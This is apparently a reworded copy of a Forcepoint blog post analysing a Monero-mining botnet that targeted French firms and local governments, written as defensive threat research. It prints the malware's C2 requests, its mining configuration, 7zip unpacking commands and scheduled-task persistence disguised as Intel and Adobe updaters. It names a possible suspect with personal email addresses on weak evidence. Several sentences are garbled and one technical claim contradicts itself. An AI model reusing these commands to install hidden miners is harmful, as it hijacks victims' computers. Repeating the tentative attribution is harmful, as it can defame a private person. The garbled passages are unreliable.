Forcepoint(tm), Security Labs often identify unusual or interesting pieces of malware. These malware can sometimes be part of larger, APT-driven campaigns (see our August 2016 report on the MOON campaign). Other times, they may be more niche, such as this mini Monero mining botnet.

Similar to how the California Gold Rush lured amateurs by promises of easy money (the original “49ers”), cryptocurrency mining is attracting amateurs with low barriers to entry. These 21st-century prospectors aren’t always following legal procedures: In January 2017, it was reported that Sundown Exploit kit dropped a cryptocurrency miner based upon open source ^[2]. It was noticed that the sample contained no ‘tradecraft’ and it was suggested that this was indicative of a growing trend towards cybercrime by so-called novices.

A similar and arguably more successful campaign is underway in February 2017. It appears to impact a variety of machines in France, primarily associated with SMEs in the Haut-Rhin area.

• There are many local government networks.
• A garden equipment retailer;
• Architecture and construction firms
• A used car dealership.

Malware

The sample analysed (SHA1: 05a02703a19d798415aa98212cf0f7242ba9b4da) is a relatively unremarkable PE file. It connects to its primary C2 server for initial configuration.

GET /misc/configv36.ini HTTP/1.1 User-Agent: MyAgent Host: daterup1.ddns[. ]net Cache-Control: no-cache

It appears that the malware uses the User-Agent string “MyAgent” throughout its communications.

The server will return the unobfuscated following file. The format puts the data as the key within many sections, rather than following the INI standard of key=value pairs.

[VERSIONSERVEUR] 4.04 [NOMMAJ] AdobeServiceUpdate.exe [NOMUPDATE] IntelUpdate.exe [NOMMINER] java.exe [NOMMINERGPU] javaw2.exe [CHEMINMAJ] AdobeServiceUpdate [CHEMINUPDATE] IntelGraphics [CHEMINMINER] cryptonote [LISTESERVEURS] listeserveurs [SERVEURDOWNLOAD] hxxp://www.goepper[. ]fr/misc/ [SERVEURTEST] hxxp://daterup1.ddns[. ]net/misc/ [SERVEURACTIVITE] hxxp://daterup1.ddns[. ]net/misc/ [SERVEURSECOURS] hxxp://alurea[. ]fr/misc/ [COMMANDE32 DWARF] -dbg -1 -o stratum+tcp://xmr-eu.dwarfpool[. ]com:8005 -u 44a5RFrtbjB5VUrFxDAQYR8Y2oj5wwUJGVMKutYFm6xFRCvRD2hUjAmWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm42tXD5V -p dateretupitsthat@gmail[. ]com -t [COMMANDE64 DWARF] -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool[. ]com:8005 -u 44a5RFrtbjB5VUrFxDAQYR8Y2oj5wwUJGVMKutYFm6xFRCvRD2hUjAmWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm42tXD5V -p dateretupitsthat@gmail[. ]com -t [COMMANDE32 MINERGATE] -dbg -1 -o stratum+tcp://xdn-xmr.pool.minergate.com:45790 -u daterup@gmx[. ]com -p x -t [COMMANDE64 MINERGATE] -a cryptonight -o stratum+tcp://xdn-xmr.pool.minergate[. ]com:45790 -u daterup@gmx[. ]com -p x -t [COMMANDE32 CRYPTO] -dbg -1 -o stratum+tcp://xmr.crypto-pool[. ]fr:3333 -u 44a5RFrtbjB5VUrFxDAQYR8Y2oj5wwUJGVMKutYFm6xFRCvRD2hUjAmWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm42tXD5V -p x -t [COMMANDE64 CRYPTO] -a cryptonight -o stratum+tcp://xmr.crypto-pool[. ]fr:3333 -u 44a5RFrtbjB5VUrFxDAQYR8Y2oj5wwUJGVMKutYFm6xFRCvRD2hUjAmWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm42tXD5V -p x -t [COMMANDE32] -dbg -1 -o stratum+tcp://fcn-xmr.pool.minergate[. ]com:45590 -u daterup@gmx[. ]com -p x -t [COMMANDE64] -a cryptonight -o stratum+tcp://fcn-xmr.pool.minergate[. ]com:45590 -u daterup@gmx[. ]com -p x -t [COMMANDE64YAM] -c 1 -M stratum+tcp://daterup%40gmx.com:[email protected][. ]com:45590/fcn -t [COMMANDEGPU] javaw2.exe -o stratum+tcp://fcn-xmr.pool.minergate[. ]com:45590 -u daterup@gmx[. ]com:45590 -u daterup@gmx[.

The malware immediately requests instructions from the server.

GET /misc/workers/commandes/<32/64>--- HTTP/1.1 User-Agent: MyAgent Host: daterup1.ddns[. ]net Cache-Control: no-cache

Our sandbox received a 404 error. This is likely due to the fact that the machine has not been previously infected. The malware then downloads two files from the predefined server ( [SERVEURDOWNLOAD]):

• shortcut.lnk
• filelist36.ini

The filelist36.ini contents are in a similar format as those found in configurationv36.ini. They are listed below. The filelist36.ini section names appear to be in English, rather than French.

[ARCHIVEMINER32] archClaymore32.zip [ARCHIVEMINER64] archCryptonote64.zip [ARCHIVEMAJ32] maj32.36.zip [ARCHIVEMAJ64] maj64.36.zip [ARCHIVEUPDATE] update.36.zip [7ZA.EXE] 7za.exe [7ZA.DLL] 7za.dll [7ZXA.DLL] 7zxa.dll

Although shortcut.lnk’s contents are more interesting, it is not clear why it was included in the downloaded files. However, as you can see below, the malware seems to be a copy of the IntelUpdate process name. The file appears to be a properly formatted .lnk file and includes references to the directory/file C:\Users\Alex\AppData\Roaming\IntelGraphics\IntelUpdate.exe and the machine name alex-hp.

If 7zip isn’t installed on the infected computer, the malware will download the 7zip installation files from filelist36.ini and then download update.36.zip. Then it will unpack the zip using the command-line version of 7zip.

The password for the file is actually ‘pass’.

timeout 2 cd "%APPDATA%\7z" 7za e -ppass -y -w["%APPDATA%\cryptonote"] "%APPDATA%\update.36.zip" -o"%APPDATA%" del C:\Documents and Settings\user\Desktop\french.exe move "%APPDATA%\update.exe" C:\Documents and Settings\user\Desktop\french.exe timeout 2 "C:\Documents and Settings\user\Desktop\french.exe" del "%APPDATA%\uscript_auto_maj.bat"

The malware then contacts the original C2 again at /misc/workers/allowupdate/<32/64>—, presumably to check whether to proceed with installing the update, before removing the previous versions of itself and setting up the new version as a new scheduled task:

schtasks /Delete /tn "Microsoft Schelude Update" /F schtasks /Delete /tn "Microsoft Schelude Updater" /F schtasks /Delete /tn "Intel Service Update" /F schtasks /Delete /tn "Adobe Reader Update" /F schtasks /Delete /tn "update" /F schtasks /Delete /tn "Adobe Reader Updater" /F schtasks /create /sc MINUTE /MO 120 /tn "Intel Service Update" /tr "C:\Documents and Settings\user\Application Data\IntelGraphics\IntelUpdate.exe" /F /RL HIGHEST schtasks /create /sc MINUTE /MO 10 /tn "Adobe Reader Update" /tr "C:\Documents and Settings\user\Application Data\AdobeServiceUpdate\AdobeServiceUpdate.exe" /F /RL HIGHEST del "C:\Documents and Settings\user\Application Data\tskschl.bat" /F

Once up and running, the malware queries /misc/workers/commandes/<32/64>— again for additional commands.

Servers with C2

Daterup1.ddns[.] was at the time of writing. ]net resolves at IP address 88.120.123.246. This IP address is associated with OVH France. The primary interface appears to be in an open directory. It returns the bot control panel upon request (shown below).

We also see a bot among the workers, named alex–hp. This is similar to artifacts found in the.lnk files:

This page provides information on the success rate and uptime of the current campaign. Machines typically had up to five days of uptime as at 20 February 2017. The victim addresses are all associated with French networks/ISPs and appear to belong to a mix of home users, small and large businesses, and local government agencies.

Another page lists the available commands for botnet owners, including the ability to launch Notepad from infected machines.

Many additional C2 or download servers could be found via the listserveurs command. These servers are detailed below. Many of them appear to be hosted on other legitimate websites.

Although most of these servers are no longer in use, some still display a control panel listing inactive workers when they are probed as shown below.

Below is a now-disused C2 that shows uptime figures, which indicate that the campaign was active for at most six weeks. This is supported by dates when a number historical samples were first collected, with one sample dated back to November 2016.

Rookie mistakes?

The January miner case showed that the perpetrator had included references to his Github account within the code. This was a mistake that would prove fatal.

This actor appears to have learned from previous mistakes and practiced good hygiene in regards to Git and email addresses associated user accounts on mining sites. The email address daterup@gmx [. This campaign appears to have been solely registered for ]com.

While attribution can be difficult and sometimes impossible to prove, there are still threads in this campaign. At the time of writing daterup1.dns[.]. IP 88.120.123.246 resolves to ]net. This IP address is again listed both as the resolved address for domain blioman[.]. [.]ovh was retrieved from the listserveurs file on February 20, 2017.

WHOIS data for the domain blioman.ovh records a registrant email of alexandre.thomassin@gmail[. [.]com, indicating a possible association to the alex and alexhp strings as noted in the.lnk file as well the list of workers returned from the C2. This name is again found in the registration details of alurea[. ]net (a sister domain to alurea[. ]fr which resolves to the same IP address) as alexandre.thomassin@mi-informatique[. ]fr.

Though a weak association at best – especially given the legitimate nature of the other sites hosting C2 panels – a brief search suggests that a user named blioman has been active within a number of cryptocurrency communities including localbitcoins.com^[3], dash.org^[4], and moneroclub.com^[5].

Conclusion

Monero miners were seen in the wild before. The currency is so new that it still has a high return rate for’mining activity’.

There are many other factors that add to the appeal of cryptocurrencies.

• It was adopted by Oasis and AlphaBay, two of the most prominent deep-web marketplaces, in mid-2016.
• It is more private than Bitcoin because its opaque blockchain greatly limits the traceability of the currency. This eliminates the need to launder the currency before exchanging it for other currencies.
• The mining algorithm is memory constrained, so it is more compatible with mining on normal home computers than Bitcoin’s CPU limited algorithm. This algorithm is better suited for specialised GPU-based mining machines.

Although this seems to be a simple case, it shows the low barrier of entry to cybercrime. Open source tools and well-documented procedures could lead to more people being tempted to “have a try”.

Statement of protection

Customers of Forcepoint(tm), are protected from this threat by TRITON(r), ACE at the following stages:

Stage 5 – Dropper File – Malware components cannot be downloaded or executed.

Stage 6 – Call Home – All HTTP-based C2 traffic has been blocked.

Indicators for Compromise

Samples (SHA1)

05a02703a19d798415aa98212cf0f7242ba9b4da 0bfdf18d27d8166c9eec82707574fff1bd37a5d2 49c02edf98dc537d7603b7bade39b58464e14fb0 e106e55fd377daa15151a113ad68c18cec7447c0 8ad17ff1cf0e356f8df6f04b19fa680064dc1b5a d020ff5b82ff6809c132c176da80e6eab20b5458

C2 Domains

hxxp://altia-residences[. ]com/misc hxxp://alurea[. ]fr/misc hxxp://feuerstein[. ]fr/misc hxxp://goepper[. ]fr/misc hxxp://tiptop[. ]fr/misc hxxp://bmge[. ]net/misc hxxp://vivaldi-france[. ]fr/misc hxxp://blioman[. ]ovh:8085/misc hxxp://88.120.123[. ]246:8085/misc hxxp://daterup1.ddns[. ]net/misc

Footnotes

[1] https://blog.malwarebytes.com/cybercrime/2017/01/the-curious-case-of-a-sundown-ek-variant-dropping-a-cryptocurrency-miner/

[2] https://github.com/tsiv/ccminer-cryptonight

[3] https://localbitcoins.com/accounts/profile/Blioman/

[4] https://www.dash.org/forum/members/blioman.3938/

[5] https://www.moneroclub.com/user/1067024038

source https://www.forcepoint.com/blog/x-labs/21st-century-49ers-small-time-cryptocurrency-mining